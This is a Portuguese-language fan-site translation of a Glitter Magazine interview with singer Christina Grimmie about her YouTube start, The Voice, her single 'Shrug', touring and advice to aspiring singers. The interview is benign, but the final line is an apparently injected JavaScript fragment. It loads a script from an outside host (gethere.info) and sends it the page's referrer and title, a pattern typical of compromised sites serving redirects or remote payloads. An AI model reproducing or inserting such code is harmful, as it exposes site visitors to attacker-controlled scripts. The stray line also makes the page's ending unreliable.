Site da revista americana Glitter Magazine, publicou uma entrevista com Christina Grimmie. Ela falou sobre suas inspirações, falou um pouquinho sobre sua canção que tem lançamento previsto no Outono americano (setembro), com quem gostaria de colaborar e mais! Confira toda tradução abaixo:

A artista Pop/R&B e vencedora de um American Music Award, Christina Grimmie, atualmente é o assunto na cidade e é fácil saber o porquê! Ela recentemente venceu o Macy’s Rising Star, competição do iHeartRadio, depois de ter voltado da sua primeira turnê na Europa. Ela cresceu de sensação do YouTube, para uma artista com dois álbuns, vencendo uma American Music Award, conseguindo a terceira posição na sexta temporada no The Voice da NBC, abriu turnês para Selena Gomez, se apresentou no Dancing With The Stars da ABC, e lançou seu mais novo single “Shrug”.

GLITTER: O que inspirou você a começar a gravar vídeos no YouTube? Você sempre quis fazer disso grande? 
CHRISTINA: Eu sempre sonhei em ser uma cantora desde quanto eu era uma garotinha. Minha amiga foi quem me inspirou a começar publicar vídeos no YouTube, eu na época não tinha notado o potencial.

GLITTER: Quais são algumas das suas canções favoritas que você gravou?
CHRISTINA: Anos atrás eu fiz cover de “Telephone” da Lady Gaga e sempre amei o resultado! Minha outra favorita foi “Just A Dream” do Nelly. Um dos meus melhores!

GLITTER: Você poderia descrever suas grandes oportunidades desde o YouTube?
CHRISTINA: Eu tive a oportunidade de ir duas vezes em turnê com a Selena Gomez e isso realmente impulsionou a exposição e experiência para mim. Foi quando eu estive no The Voice que eu realmente consegui maior impulso e no programa consegui mostrar o que eu podia fazer!

GLITTER: Como foi ganhar a competição Macy’s Rising Star iHeartRadio 2015?
CHRISTINA:
Foi inacreditável… considerando os votos que tive dos seguidores em relação aos outros, eu era menor comparada a eles. Eu não estava certa se nós conseguiríamos mas Team Grimmie realmente veio e votou SEM PARAR como pequenos patrões! SOLDADOS, AVANTE!

GLITTER: Você realizou muito, lançou dois álbuns independentemente, venceu um American Music Award, conseguiu a terceira posição na sexta temporada do The Voice na NBC, abriu shows para Selena Gomez em turnê, se apresentou no Dancing With The Stars, e lançou seu single “Cliché” conseguindo a 7 posição nas paradas do iTunes! Qual momento foi o maior e fez você beliscar você mesma?
CHRISTINA: Tudo haha. Não há uma parte desta lista que não me faça explodir de felicidade. Eu apenas quero subir cada vez mais durante o resto da minha carreira, porque com o poder do Team Grimmie, eu não vou parar.

GLITTER: Como você se sentiu em sua primeira turnê europeia? 
CHRISTINA: Incrível!! Tão maravilhoso sair por aí e conhecer meus Frands ao redor do mundo.

GLITTER: O que podemos esperar da sua nova música que será lançada neste outono? 
CHRISTINA: Um conjunto de emoções! E isso é tudo que irei dizer!

GLITTER: Algum plano para uma turnê americana?
CHRISTINA: Não ainda.

GLITTER: Você está ansiosa para o iHeartRadio Music Festival em Las Vegas neste outono, o que você está preparando para ele?
CHRISTINA: Tão ansiosa! Eu quero que este show seja o melhor show que eu já tenha feito, considerando o tamanho dele. É minha chance de mostrar o que eu tenho e ter o melhor momento da minha vida!

GLITTER: O que inspirou você a criar “Shrug”?
CHRISTINA: Eu eu nunca tive uma canção que fosse aquele soco que “Shrug” tem; uma sábia-mensagem E sábia-batida.

GLITTER: Com quem você amaria colaborar? 
CHRISTINA: Calvin Harris, Skrillex, e talvez um dueto com Aguilera!

GLITTER: O que é um dia na vida para você?
CHRISTINA: Eu faço musica em meu próprio tempo, brinco com batidas e rimas que eu escrevo. Sempre praticando apresentações em meu quarto, na maioria das vezes pareço uma idiota dançando haha. Eu jogo muito videogame…. muito League of Legendes e Smash Bros!

GLITTER: Quanto tempo você leva praticando?
CHRISTINA: Um pouco. Sempre trabalhando em novas maneiras de melhorar meus arranjos e precisão. Assim como a construção de resistência para cantar bem, o que é mais difícil do que as pessoas pensam.

GLITTER: Café ou chá?
CHRISTINA: Café, com certeza.

GLITTER: Lugar favorito para compras?
CHRISTINA: BCBG, Urban Outfitters, Target, GameStop e qualquer lugar que tenha muita comida.

GLITTER: Comida favorita e lugar para comer?
CHRISTINA: Comida italiana e sushi. Embora eu prefira comida caseira da minha mãe, acima de tudo.

GLITTER: Você tem queda por alguma celebridade?
CHRISTINA: O cabelo do Harry Style é provavelmente a melhor coisa deste planeta. E não julgue mas eu sempre tive uma queda pelo Link do The Legend of Zelda, sshhh.

GLITTER: Quais artistas tem sido uma inspiração para vocês e por que? 
CHRISTINA: Skrillex, o primeiro porque ele trilhou seu próprio caminho do EDM e fez sua própria coisa e fez isso funcionar. Muito respeito por isso. Eu amo a mensagem que Tori Kelly dá, na qual é humildade e singularidade e ela não tem medo de não ser como todo mundo. A mensagem eu quero enviar assim como ela.

GLITTER: Fale seus 5 produtos de beleza agora?
CHRISTINA: Bobbi Brown para pele, base Naked EyesShadow Pallet, delineador preto Makeup Forever, minha prancha e secador de cabelo!

GLITTER: Qual conselho você daria para as garotas que querem cantar e que estão começando?
CHRISTINA: Por favor, por favor, POR FAVOR seja você mesma. Se você não estiver sendo você, dê um passo para atrás. Se você estiver postando suas músicas no YouTube, talvez comece com um cover popular feito de uma maneira única.

GLITTER: Com tantas influências online hoje, qual sua definição de amor próprio?
CHRISTINA: Não importa o que a sociedade esteja tentando colocar em sua cabeça sobre como você deveria parecer, como você deveria agir, e o que você precisa dizer, eu acho que tudo é uma porcaria. Tudo isso. Seja você mesmo e você. Seja respeitoso com os seus colegas e a si mesmo, é claro. Não seja babaca. Mas ao mesmo tempo, não se contente com nada a não ser com você mesmo.

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;